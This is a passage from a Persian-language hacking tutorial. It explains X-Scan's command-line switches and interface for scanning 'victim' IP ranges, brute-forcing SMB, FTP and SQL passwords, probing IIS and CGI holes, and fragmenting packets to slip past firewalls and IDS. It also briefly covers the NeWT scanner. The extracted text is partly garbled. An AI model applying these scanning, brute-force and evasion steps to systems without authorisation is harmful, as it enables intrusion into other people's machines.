ﻣﻴﮑﻨﻢ هﻤﺎن ٣٫١ﺏﺎﺷﺪ ﻣﺎل ٢٠٠۴/٣/٢۵اﺱﺖ. ﺷﮑﻞ ﻋﻤﻮﻣﯽ دﺱﺘﻮرات در ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ دو ﺷﮑﻞ زیﺮ اﺱﺖ : ]C:\>xscan -host <startIP>[-<endIP>] <module> [option ]C:\>xscan -file <module> [option ﺧﻮب هﻤﻪ ﭼﻴﺰ ﮐﺎﻣﻼ واﺽﺢ اﺱﺖ .ﺏﻪ ﺟﺎی ]> <startIP>[-<endIPﺷﻤﺎ IPیﺎ IPهﺎی ﻗﺮﺏﺎﻧﯽ را ﻣﻴﻨﻮیﺴﻴﺪ .ﺏﻪ ﺟﺎی > <moduleهﻢ یﮑﯽ ی ﺎ ﻣﺨﻠﻮﻃﯽ از ﺱﻮیﭻ هﺎی ﺟﺪول ﺷﻤﺎرﻩ ١را ﻣﻴﻨﻮیﺴﻴﻢ .و ﺏﻪ ﺟﺎی ] [optionهﻢ اﮔﺮ ﻻزم داﻧﺴﺘﻴﺪ یﮑﯽ از ﺱﻮیﭻ هﺎی ﺟﺪول ﺷﻤﺎرﻩ دو را ﻣﻴﻨﻮیﺴﻴﺪ. ﺟﺪول ﺷﻤﺎرﻩ : ١ ١
ﺱﻮیﭻ -active
٢
-port
٣
-smb
۴
-netbios
۵ ۶
-snmp -OS
٧
-ftp
٨
-pub
٩
-POP3
١٠
-smtp
١١
-sql
١٢
-iis
١٣
-cgi
١۴ ١۵
-nasl -all
ﺕﻮﺽﻴﺤﺎت ﺏﺮای ایﻦ اﺱﺖ ﮐﻪ درک ﮐﻨﺪ ﺁیﺎ ایﻦ IPﮐﻪ ﺷﻤﺎ ﺏﻪ ﺏﺮﻧﺎﻣﻪ دادیﺪ ﺁیﺎ ﺏﺎﻻ اﺱﺖ یﺎ ﻧﻪ .یﮏ ﺟﻮر هﺎیﯽ هﻤﺎن ﻋﻤﻞ Pingرا اﻧﺠﺎم ﻣﻴﺪهﺪ ).وﻗﺘﯽ یﮏ رﻧﺞ IPرا ﺏﻪ ﺏﺮﻧﺎﻣﻪ ﻣﻴﺪهﻴﺪ ﺧﻴﻠﯽ ﻣﻔﻴﺪ اﺱﺖ ( وﺽﻌﻴﺖ ﭘﻮرت هﺎی TCPرا یﮏ ﻧﮕﺎهﯽ ﻣﻴﮑﻨﺪ .ﻓﮑﺮ ﮐﻨﻢ از ﻣﮑﺎﻧﻴﺰم ﭘﺎ ﺕﮑﺎﻧﯽ ٣ﻣﺮﺡﻠﻪ ایﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ .و اﻟﺒﺘﻪ ﻣﮑﺎﻧﻴﺰم SYNرا هﻢ ﭘﺸﺘﻴﺒﺎﻧﯽ ﻣﻴﮑﻨﺪ. ﺏﺮای ﺏﺪﺱﺖ ﺁوردن ﮐﻠﻤﻪ هﺎی ﻋﺒﻮر اﺷﺘﺮاک هﺎی ﭘﺮوﺕﮑﻞ SMBﮐﻪ ﺏﻌﺪا ﮐﺎﻣﻞ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ یﮏ ﺱﺮی ﺕﻼش اﺱﺎﺱﯽ ﻣﻴﮑﻨﺪ .و اﻟﺒﺘﻪ ایﻦ راهﻢ ﺏﮕﻢ ﮐﻪ ﺏﺮای ﺡﻔﺮﻩ هﺎی ﻣﻮﺟﺪ در ایﻦ ﭘﺮوﺕﮑﻞ هﻢ ﭘﻮیﺶ ﻣﻴﮑﻨﺪ. یﮏ ﺱﺮی اﻃﻼﻋﺎت در ﺏﺎرﻩ NetBIOSﺏﺪﺱﺖ ﻣﯽ ﺁورد .اﻟﺒﺘﻪ در ﺻﻮرت ﻓﻌﺎل ﺏﻮدن ،ﮐﻪ در ایﻦ دورﻩ زﻣﺎﻧﻪ ﺏﺮای ﺱﺮور هﺎ ﺏﻌﻴﺪ اﺱﺖ ﮐﻪ اﺻﻼ ایﻦ ﺱﺮویﺲ ﻓﻌﺎل ﺏﺎﺷﺪ .و اﻟﺒﺘﻪ ﺏﻪ دﻧﺒﺎل ﺡﻔﺮﻩ هﺎی ایﻦ ﭘﺮوﺕﮑﻞ هﻢ ﻣﻴﮕﺮدد. در ﺻﻮرت ﻓﻌﺎل ﺏﻮدن ایﻦ ﭘﺮوﺕﮑﻞ ﺏﺮای وﺟﻮد ﺡﻔﺮﻩ هﺎ ﺁن را ﭘﻮیﺶ ﻣﯽ ﮐﻨﺪ. ﺱﻌﯽ ﻣﻴﮑﻨﺪ ﺷﻤﺎرﻩ ﻧﺴﺨﻪ و اﻟﺒﺘﻪ ﺧﻮد و ﻧﻮع ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ را ﮐﺸﻒ ﮐﻨﺪ ﺏﻌﺪ از Nmapﺧﻴﻠﯽ ﮐﺎراش درﺱﺖ اﺱﺖ و اﻟﺒﺘﻪ ﺏﺮای ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ان ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ را یﮏ ﭘﻮیﺶ ﻧﻴﺰ) ﺏﺮای ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ﻣﻮﺟﺪ در ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ( ﻣﻴﮑﻨﺪ. ﺧﻮب هﻤﻪ ایﻦ ﭘﺮوﺕﮑﻞ را ﻣﻴﺸﻨﺎﺱﻨﺪ .ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺎ اﺱﺘﻔﺎدﻩ از ﻣﮑﺎﻧﻴﺰم Brute Forceﺱﻌﯽ ﻣﻴﮑﻨﺪ ﮐﻠﻤﻪ ﻋﺒﻮر را ﮐﺸﻒ ﮐﻨﺪ و اﻟﺒﺘﻪ ﺏﺮای ﺡﻔﺮﻩ هﺎ ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ﻣﻮﺟﺪ در ایﻦ ﭘﺮوﺕﮑﻞ هﻢ ،یﮏ ﭘﻮیﺶ ﻣﻴﮑﻨﺪ. یﮏ ﺁزﻣﺎیﺸﯽ ﻣﻴﮑﻨﺪ ﺏﺒﻴﻨﺪ ﮐﻪ ﺁیﺎ ﺁن ﻣﺎﺷﻴﻦ اﺟﺎرﻩ دﺱﺘﺮﺱﯽ ﻧﺎﺷﻨﺎس ) (anonymousرا ﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ و اﻟﺒﺘﻪ ﺏﺎز هﻢ یﮏ ﺱﺮی ﭘﻮیﺶ ﺏﺮای ﮐﺸﻒ ﺡﻔﺮﻩ ﺁﻧﺠﺎم ﻣﻴﺪهﺪ. ﺧﻮب ایﻦ ﭘﺮوﺕﮑﻞ ﮐﺸﺶ ﻧﺎﻣﻪ از ﺻﻨﺪوق ﭘﺴﺘﯽ اﻟﮑﺘﺮوﻧﻴﮏ اﺱﺖ .ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ در ﺻﻮرت ﻓﻌﺎل ﺏﻮدن ایﻦ ﺱﺮویﺲ ﺏﺮﻧﺎﻣﻪ یﮏ ﺱﺮی ﭘﻮیﺶ ﺏﺮای ﮐﻒ ﺡﻔﺮﻩ هﺎ اﻧﺠﺎم ﻣﻴﺪهﺪ. ﺧﻮب ایﻦ هﻤﺎن ﭘﺮوﺕﮑﻞ ارﺱﺎل و دریﺎﻓﺖ ﭘﺴﺖ اﻟﮑﺘﺮوﻧﻴﮏ یﺎ هﻤﺎن E-Mailﺧﻮدﻣﺎن اﺱﺖ. ﮐﻪ ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ یﮏ ﺱﺮی اﻃﻼﻋﺎت اﺱﺎس در ﺏﺎرﻩ ﺁن ﻣﻴﮕﻴﺮد و ایﻦ ﭘﺮوﺕﮑﻞ را ﺏﺮای وﺟﻮد ﺡﻔﺮﻩ هﺎ ﻣﻴﮕﺮدد. ﺧﻮب اﮔﺮ ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ از ایﻦ ﺱﺮویﺲ اﺱﺘﻔﺎدﻩ ﺏﮑﻨﺪ ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺮﻧﺎﻣﻪ ﺏﺮای ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ﻣﻮﺟﺪ در ایﻦ ﺱﺮویﺲ یﮏ ﺕﻼﺷﯽ ﻣﻴﮑﻨﺪ. اﮔﺮ ﺷﻤﺎ ﻣﻴﺪاﻧﻴﺪ ﺱﺮویﺲ دهﻨﺪﻩ وب ایﻦ ﻣﺎﺷﻴﻦ از ﻧﻮع IISدر ﭘﻴﺖ ﻣﺎیﮑﺮوﺱﺎﻓﺖ اﺱﺖ ،ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺡﺘﻤﺎ )ﺏﺎﻻی (%٩٩٫٩٩٩٩ﺷﻤﺎ یﮏ ﺕﻌﺪادی ﺡﻔﺮﻩ ﻋﺎﻟﯽ ﮐﺸﻒ ﻣﻴﮑﻨﻴﺪ. اﮔﺮ ﻣﻴﺪاﻧﻴﺪ وب ﺱﺎیﺖ هﺪف از ﺕﻮاﺏﻊ CGIاﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ ،ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺮﻧﺎﻣﻪ یﮏ ﭘﻮیﺶ هﻢ درﺏﺎرﻩ ایﻦ ﺱﺮویﺲ اﻧﺠﺎم ﻣﻴﺪهﺪ ﺕﺎ ﺡﻔﺮﻩ هﺎی ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ را ﮐﺸﻒ ﮐﻨﺪ. ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺮﻧﺎﻣﻪ از scriptsهﺎی ﺏﺮﻧﺎﻣﻪ Nessusاﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ. ایﻦ ﺱﻮیﭻ ﺕﻤﺎم ﺱﺮویﺲ هﺎی ﮐﻪ ﺏﺮای ﺁن scriptsدارد را ﭘﻮیﺶ ﻣﻴﮑﻨﺪ.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٤٤
ﺟﺪول ﺷﻤﺎرﻩ دو : ١
ﺱﻮیﭻ -i
٢
-l
٣
-v
۴
-p
۵
-o
۶
-t
٧
-log
ﺕﻮﺽﻴﺤﺎت ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺎیﺪ ﺏﻌﺪ از ﺁن ﻧﺎم ﮐﺎرت ﺷﺒﮑﻪ ﻣﻮرد اﺱﺘﻔﺎدﻩ ﺧﻮد یﺎ ﺷﻤﺎرﻩ ) (IPﺁن را وارد ﮐﻨﻴﺪ )ﺏﺮای ﺁﻧﻬﺎیﯽ ﮐﻪ ﺕﻮﺱﻂ ﮐﺎرت ﺷﺒﮑﻪ ﻗﺴﻂ ﭘﻮیﺶ را دارﻧﺪ( .اﻟﺒﺘﻪ وارد ﮐﺮدن IPﺧﻮدﺕﺎن ﺏﺮای ﮐﺴﺎﻧﯽ ﮐﻪ ﺏﻪ وﺱﻴﻠﻪ ﻣﻮدم ﺏﻪ ایﻨﺘﺮﻧﺖ یﺎ هﺮ ﺷﺒﮑﻪ ای ﮐﻪ وﺻﻞ ﻣﻴﺸﻮﻧﺪ ﺧﺎﻟﯽ از ﻓﺎیﺪﻩ ﻧﻴﺴﺖ. ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺮای ﺷﻤﺎ یﮏ ﻟﻴﺴﺘﯽ ﮐﻪ ﺡﺎوی ﺷﻤﺎرﻩ هﺎی ﮐﺎرت ﺷﺒﮑﻪ ﺷﻤﺎ اﺱﺖ ﻣﯽ ﺁورد. ایﻦ ﺱﻮیﭻ ﺏﺎﻋﺚ ﻧﻤﺎیﺶ ﺟﺰﺋﻴﺎت هﻴﻦ اﻧﺠﺎم ﮐﺎر ﻣﻴﺸﻮد یﺎ ﺏﻪ ﻋﺒﺎرﺕﯽ روﻧﺪ اﻧﺠﺎم ﮐﺎر را ﺏﻪ ﺷﻤﺎ ﻧﺸﺎن ﻣﻴﺪهﺪ. ایﻦ ﺱﻮیﭻ ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﮐﻪ اﮔﺮ یﮏ ﻣﻴﺰﺏﺎﻧﯽ ﺏﻪ ﻣﺎ در ﺟﻮاب Pingﭘﺎﺱﺨﯽ ﻧﺪاد ﺁن را ﻧﺎدیﺪﻩ ﺏﮕﻴﺮد و ﺏﻪ ﺱﺮاغ ﺏﻌﺪی ﺏﺮود. ایﻦ ﺱﻮیﭻ ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﮐﻪ اﮔﺮ ﺏﺮ یﮏ ﻣﻴﺰﺏﺎن یﮏ ﭘﻮرت ﺏﺎز هﻢ ﭘﻴﺪا ﻧﮑﺮد ﺁن را ﻧﺎدیﺪﻩ ﺏﮕﻴﺮد و ﺏﻪ ﺱﺮاغ ﺏﻌﺪی ﺏﺮود. ﺧﻮب ایﻦ یﮑﯽ از ﻣﮑﺎﻧﻴﺰم هﺎی ﻣﺨﻔﯽ ﻣﺎﻧﺪن اﺱﺖ ﮐﻪ در ﺏﺎﻻ ﺕﺮ هﺎ ﺏﺮای ﺏﺮﻧﺎﻣﻪ nmapﮔﻔﺘﻢ ﭼﯽ هﺴﺖ .ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﮔﺰیﻨﻪ ﺏﺮﻧﺎﻣﻪ ﺏﺴﺘﻪ هﺎ را ﺕﮑﻪ ﺕﮑﻪ ﮐﺮدﻩ و ﻣﻴﻔﺮﺱﺘﺪ ﮐﻪ ﺷﻨﺎﺱﺎیﯽ ﺷﻤﺎ ﻣﺸﮑﻞ ﻣﻴﺸﻮد و اﺡﺘﻤﺎل ﻋﺒﻮر ﺏﺴﺘﻪ هﺎ از دیﻮار ﺁﺕﺶ ﺧﻴﻠﯽ زیﺎد ﺕﺮ ﻣﻴﺸﻮد و هﻤﭽﻨﻴﻦ ﺡﺬف ﺏﺴﺘﻪ ﺕﻮﺱﻂ ﻓﻴﻠﺘﺮ هﺎ و ﻣﺴﻴﺮیﺎب هﺎ اﺡﺘﻤﺎل ایﻦ اﺕﻔﺎق هﻢ ﮐﻤﺘﺮ ﺷﺪﻩ اﻣﺎ اﺡﺘﻤﺎل ﻧﺘﻴﺠﻪ ﮔﺮﻓﺘﻦ ﺻﺤﻴﺢ ﮐﻤﺘﺮ ﻣﻴﺸﻮد اﻟﺒﺘﻪ ﺏﺎ ایﻦ ﮐﺎر دزد ﮔﻴﺮ یﺎ هﻤﺎن اﻓﺴﺮ ﺧﻮدﻣﺎن ) ( IDSدیﮕﻪ ﻓﻌﺎل ﻧﻤﻴﺸﻮد ﺏﺮای ﻣﺎ .ﺏﻌﺪ از ایﻦ ﺱﻮیﭻ ﺷﻤﺎ ﺏﺎیﺪ ﺕﻌﺪاد ﺕﮑﻪ ﺕﮑﻪ ﺷﺪن هﺮ ﺏﺴﺘﻪ را ﻣﺸﺨﺺ ﮐﻨﻴﺪ ﺕﻌﺪاد ﺁن را .اﻟﺒﺘﻪ اﻣﮑﺎن اﺱﺘﻔﺎدﻩ از ﺱﻮیﭻ ﺧﺎﻟﯽ ﺕﻴﺰ هﺴﺖ ﮐﻪ ﺕﻌﺪاد ﺧﻮرد ﮐﺮدن ﺏﺴﺘﻪ را ﺧﻮدش ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ﮐﻪ ﺏﺪ هﻢ ﻧﻴﺴﺖ. ﮐﻪ ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﻌﺪ از ﺁن ﺏﺎیﺪ ﻧﺎم ﻓﺎیﻞ ﻧﺘﻴﺠﻪ را ﺏﻪ یﮑﯽ از دو ﻓﺮﻣﺖ txtو یﺎ htmlرا وارد ﮐﻨﻴﺪ .ایﻦ ﮐﺎر را ﻧﮑﻨﻴﺪ ﺏﻬﺘﺮ) از ایﻦ ﺱﻮیﭻ اﺱﺘﻔﺎدﻩ ﻧﮑﻨﻴﺪ ( اﺱﺖ زیﺮا ﺏﺪون ایﻦ ﺱﻮیﭻ ﺧﻮد ﺏﺮﻧﺎﻣﻪ ﻓﺎیﻞ ﻧﺘﻴﺠﻪ را ﺏﺎ ﻧﺎم IPﻣﺎﺷﻴﻦ هﺪف ﺏﺎ هﺮ دو ﻓﺮﻣﺖ در ﭘﻮﺷﻪ logﮐﻪ در ﭘﻮﺷﻪ ﺧﻮد ﺏﺮﻧﺎﻣﻪ اﺱﺖ ایﺠﺎد ﻣﻴﮑﻨﺪ.
ﺧﻮب واﻗﻌًﺎ ﮐﺎر ایﻦ ﺏﺮﻧﺎﻣﻪ ﮐﺎر درﺱﺖ اﺱﺖ ،اﻟﺒﺘﻪ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ هﻤﻴﺸﻪ از ﺱﺎیﺖ Nessusاﺧﺮیﻦ scriptsه ﺎی naslرا ﺏﮕﻴﺮی ﺪ و داﺧ ﻞ ﭘﻮﺷ ﻪ scriptsایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺮیﺰیﺪ ﺕﺎ ﺏﻬﺘﺮیﻦ ﻧﺘﺎیﺞ را دریﺎﻓﺖ ﮐﻨﻴﺪ و یﺎ از اﻣﮑﺎن Updateﺧﻮد ﺏﺮﻧﺎﻣﻪ اﺱﺘﻔﺎدﻩ ﮐﺮدﻩ. ﮐﻠﻴﮏ ﻣﻴﮑﻨﻴﺪ ﺕ ﺎ
ﺧﻮب ﮐﺎر ﺏﺎ راﺏﻂ ﮐﺎرﺏﺮی ایﻦ ﺏﺮﻧﺎﻣﻪ راﺡﺖ اﺱﺖ اول ﺏﻌﺪ ﺏﺎﻻ ﺁﻣﺪن ایﻦ ﺏﺮﻧﺎﻣﻪ ﺕﺮﮐﻴﺐ Ctrl+Eرا زدﻩ یﺎ روی دﮐﻤﻪ ﺏﻪ ﺏﺨﺶ ﺕﻨﻈﻴﻤﺎت ﺏﺮویﺪ. در ﺻﻔﺤﻪ Generalﺷﻤﺎ IPﻣﺎﺷﻴﻦ ﻣﻮرد ﻧﻈﺮ ﺧﻮد را وارد ﻣﻴﮑﻨﺪ در ﻗﺴﻤﺖ ﮐﻨﺎری ﺁن ﻣﻴﺘﻮاﻧﻴﺪ ﻧ ﻮع ﺷ ﻴﻮﻩ ﮔ ﺰارش ﺧ ﻮد را اﻧﺘﺨ ﺎب ﮐﻨﻴ ﺪ و ﻧ ﺎم ﺁن را ﻋﻮض ﮐﻨﻴﺪ و.. در ﺻﻔﺤﻪ Advancedﺷﻤﺎ در ﻗﺴﻤﺖ اول ﺁن ﺷﻤﺎ ﻣﻴﺰان ﺕﮑﻪ ﺕﮑﻪ ﮐﺮدن ﻓﺎیﻞ ﺏﺮای ﻣﺨﻔﯽ ﻣﺎﻧﺪن را ﻣﺸﺨﺺ ﻣﻴﮑﻨﻴﺪ)ﺏﺮای ﺕﻮﺽﻴﺤﺎت ﺏﻴ ﺸﺘﺮ ﺏ ﻪ ﺏﺨﺶ ﺧﻂ ﻓﺮﻣﺎن ﻣﺮاﺟﻌﻪ ﮐﻨﻴﺪ( .در ﺏﺨﺶ دوم ﮔﺰیﻨﻪ اول در ﺻﻮرت ﻋﻼﻣﺖ زدن روﻧﺪ ﭘﻴﺸﺮﻓﺖ ﮐﺎر را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ. ﺏﺮای ﮔﺰیﻨﻪ skip host when failed to get responseﺏﻪ ﺕﻮﺽﻴﺤﺎت ﺱﻮیﭻ –pﻣﺮاﺟﻌﻪ ﺷﻮد. ﺏﺮای ﮔﺰیﻨﻪ skip host when no open port has bin failedﺏﻪ ﺕﻮﺽﻴﺤﺎت ﺱﻮیﭻ –oﻣﺮاﺟﻌﻪ ﮐﻨﻴﺪ. ﮔﺰیﻨﻪ Scan Alwaysﭼﻪ ﭘﻮرت ﺏﺎز ﭘﻴﺪا ﮐﻨﺪ یﺎ ﻧﮑﻨﺪ یﺎ ﻣﺎﺷﻴﻦ ﺟﻮاب ﺏﺪه ﺪ ی ﺎ ﻧﺪه ﺪ اﻧﺠ ﺎم ﻣﻴﺪه ﺪ ) .ﻣﻌ ﺎدل ای ﻦ ﮔﺰیﻨ ﻪ در ﺧ ﻂ ﻓﺮﻣ ﺎن ﻣ ﺴﺎوی ﺏ ﺎ اﺱﺘﻔﺎدﻩ ﻧﮑﺮدن از هﻴﭻ ﮐﺪام از ﺱﻮیﭻ هﺎی –pو –oاﺱﺖ ( در ﺻﻔﺤﻪ Portﺷﻤﺎ ﻟﻴﺴﺖ ﭘﻮرت هﺎیﯽ را ﮐﻪ ﺏﺎیﺪ ﺏﮕﺮدد و ﻣﮑﺎﻧﻴﺰم ﺁن و ﻣﻌﺎدل ﭘﻮرت هﺎی ﭘﻴﺶ ﻓﺮض را ﺕﻨﻈﻴﻢ ﻣﻴﮑﻨﻴﺪ. در ﺻﻔﺤﻪ هﺎی ﺏﻌﺪی هﻢ یﮏ ﺱﺮی ﭼﻴﺰ دیﮕﻪ ﺡﺎﻻ ﺏﻌﺪ از ﭘﻴﮑ ﺮ ﺏﻨ ﺪی ﻣ ﻮرد ﻋﻼﻗ ﻪ ﺧ ﻮد دﮐﻤ ﻪ OKرا زدﻩ ﺕ ﺎ ﺕﻐﻴ ﺮات در ﻓﺎی ﻞ Configذﺧﻴ ﺮﻩ ﺷﻮد ﺡﺎﻻ ﺏﺎ ﮐﻠﻴﺪ روی دﮐﻤﻪ ﺷﺮوع ) یﮏ ﻓﻠﺶ ﺱﺒﺰ ﺏﺎﻻ هﺴﺖ ( ﮐﺎر ﺷﺮوع ﻣﻴﺸﻮد. ﺧﻮب ﺏﻌﺪ از ﺕﻤﺎم ﮐﺎر ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﻧﺘﻴﺠﻪ را ﻣﺸﺎهﺪﻩ ﮐﻨﻴﺪ ﮐﻪ ﺏﺮای هﺮ ﺡﻔﺮﻩ یﮏ ﺷﻤﺎرﻩ IDدادﻩ اﺱﺖ ﮐﻪ ﺏ ﺎ ه ﻢ ﻣﺘﻔ ﺎوت ه ﺴﺘﻨﺪ ﺕ ﺎ ایﻨﺠ ﺎ را داﺷ ﺘﻪ ﺏﺎﺷﻴﺪ ﺕﺎ ﺏﻘﻴﻪ ﻧﺮم اﻓﺰارهﺎ را ﺏﻪ ﺷﻤﺎهﺎ یﺎد ﺏﺪم ﺏﻌﺪ ﺏﮕﻢ ﺏﺎ ایﻦ ﻋﺪد ﭼﻪ ﮐﺎر ﺏﺎیﺪ ﺏﮑﻨﻴﺪ. ای یﺎدم رﻓﺖ ﺏﮕﻢ ﮐﻪ ایﻦ ﺏﺮﻧﺎﻣﻪ ی ﮏ ﻧ ﺴﺨﻪ از Winpcapرا هﻤ ﺮاﻩ ﺧ ﻮدش دار دو اﻟﺒﺘ ﻪ ﺕﻤ ﺎم ه ﺮ ﭼﻴ ﺰی را ﮐ ﻪ ﻻزم دارد و ﻣﺜ ﻞ ﺧﻴﻠ ﯽ از ﻧ ﺮم اﻓﺰارهﺎی هﮏ ﮐﻪ از ﻟﻴﻨﻮﮐﺲ ﺁﻣﺪﻩ اﻧﺪ ﻧﻴﺴﺖ ﮐﻪ یﮏ دو ﺟﻴﻦ ﺏﺮﻧﺎﻣﻪ را ﺏﺮاش ﺏﺎیﺪ ﻧﺼﺐ ﮐﻨﯽ ﺕﺎ ﺏﺮای ﺷﻤﺎ ﮐﺎر ﮐﻨﺪ.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٤٥
ﻧﺴﺨﻪ ویﻨﺪوز Nessusﺏﺮﻧﺎﻣﻪ : NeWT Security Scanner ایﻦ ﻧﺮم اﻓﺰار ایﻦ ﺷﮑﻠﯽ ﮐﻪ ﭘﺎیﻴﻦ ﻣﯽ ﺏﻴﻨﻴﺪ :
ﺧﻮب ایﻦ هﻢ ﻣﺜﻞ ﺏﺎﻻیﯽ اﺱﺖ ﮐﺎرش ،اﮔﺮ ﻣﻴﺨﻮاهﻴﺪ رایﺎﻧﻪ ﺧﻮدﺕ ﺎن را ﭘ ﻮیﺶ ﮐﻨﻴ ﺪ ﻣ ﻦ ای ﻦ ﺕﻮﺻ ﻴﻪ ﻣﻴﮑ ﻨﻢ!! ) ﭼ ﻮن واﻗﻌ ًﺎ ﻧﻔﻬﻤ ﻢ اﺱ ﺖ ﺏ ﻪ ﻣﻌﻨ ﯽ واﻗﻌﯽ ﮐﻠﻤﻪ ﺏﺮای ایﻨﮑﻪ ﻣﻴﮕﻮیﺪ " ﻣﻦ ﺏﻪ ﺷﻤﺎ در ﻧﺴﺨﻪ رایﮕﺎن ایﻦ ﻣﺤﺼﻮل اﺟ ﺎزﻩ ﻣﻴ ﺪهﻢ IPه ﺎی ﮐ ﻼس Cرا ﭘ ﻮیﺶ ﮐﻨﻴ ﺪ " اﻣ ﺎ ﺁﻧﻬ ﺎیﯽ ﮐ ﻪ ای ﻦ داﻧﻠﻮد ﮐﺮدن ﻣﯽ داﻧﻨﺪ ﮐﻪ ﻓﻘﻂ اﺟﺎزﻩ ﻣﻴﺪهﺪ ﮐﻪ رایﺎﻧﻪ ﺧﻮدﺕﺎن را اﺱﮑﻦ ﮐﻨﻴﺪ یﮏ ﺕﻮﺽﻴﺢ ﺏﺪم IPهﺎی ﮐ ﻼس Cﺁن Ipه ﺎیﯽ ه ﺴﺘﻨﺪ ﮐ ﻪ ﻋ ﺪد ﺱ ﻤﺖ ﭼﭗ ﺏﻴﻦ ١٩٢ﺕﺎ ٢٢٣اﺱﺖ اﻟﺒﺘﻪ درﺏﺎرﻩ اﺻﻮل ﭘﺎیﻪ ای هﻤﭽﻮن ایﻦ ﺏﻌﺪا ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ در ﺽﻤﻴﻤﻪ ﻣﻘﺎﻟﻪ ( ﺧﻮب ایﻦ ﻧﺮم اﻓﺰار یﮏ ﻧﺴﺨﻪ ﺡﺮﻓﻪ ای هﻢ دارد ﺏﻪ ﻧﺎم ) NeWT Proﺏ ﻪ ﺡ ﺮوف ﮐﻮﭼ ﮏ و ﺏ ﺰرگ ﺕﻮﺟ ﻪ ﮐﻨﻴ ﺪ ﭼ ﻮن ی ﮏ ﺏﺮﻧﺎﻣ ﻪ اﺱ ﺖ ﮐ ﻪ ﺏ ﺎ هﻤﻴﻦ اﺱﻢ ﮐﻪ ﺕﻤﺎم ﺡﺮوف ﺁن ﺏﺰرگ اﺱﺖ( ﮐﻪ ﻣﺤﺪودیﺖ اﺱﮑﻦ ﻧﺪارد اﻣﺎ هﻨﻮز ﺏﺪﺱﺖ ﻣﻦ ﻧﺮﺱﻴﺪﻩ . ایﻦ ﺏﺮﻧﺎﻣﻪ هﻢ دارای یﮏ راﺏﻂ ﮐﺎرﺏﺮی اﺱﺖ ﮐﻪ دﻗﻴﻘﺎ ﻣﺜﻞ ﺏﺎﻻی اﺱﺖ ﻓﺎیﻞ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﻧﺎم NeWTCmdاﺱﺖ ﮐﻪ ﺏﻌﺪ از اﺟﺮا ایﻦ ﺷﮑﻠﯽ : C:\Tenable\NeWT>NeWTCmd.exe NeWTCmd 2.1 -- Copyright (C) 2003 - 2004 Tenable Network Security >Usage: NeWTCmd [scan target]
اﻣﻴ ﺪوار ه ﺴﺘﻢ ﮐ ﻪ ای ﻦ ﺏ ﺎ ﻧ ﺮم اﻓ ﺰار ﺏ ﺎﻻی ی ﮏ ﻣﻘﺎی ﺴﻪ ﺏﮑﻨﻴ ﺪ ﺏﻌ ﺪ ﻣﻴﻔﻬﻤﻴ ﺪ ﮐ ﻪ اﺟﺤ ﺎﻓﯽ در ﺡ ﻖ X-Scanﺷ ﺪﻩ ﮐ ﻪ اﺱ ﻤﺶ و ﻟﻴﻨ ﮏ ﺁن در ﺱ ﺎیﺖ Nessusﻗﺮار ﻧﺪادﻩ اﻧﺪ ﺏﻌﺪ ﻟﻴﻨﮏ ایﻦ در ﭘﻴﺖ را ﮔﺬاﺷﺘﻨﺪ .
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٤٦
ایﻦ هﻢ دﻟﻴﻠﯽ ﺏﺮ ﻧﻔﻬﻤﻢ ﺏﻮدن ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﻏﺎیﺖ !!!
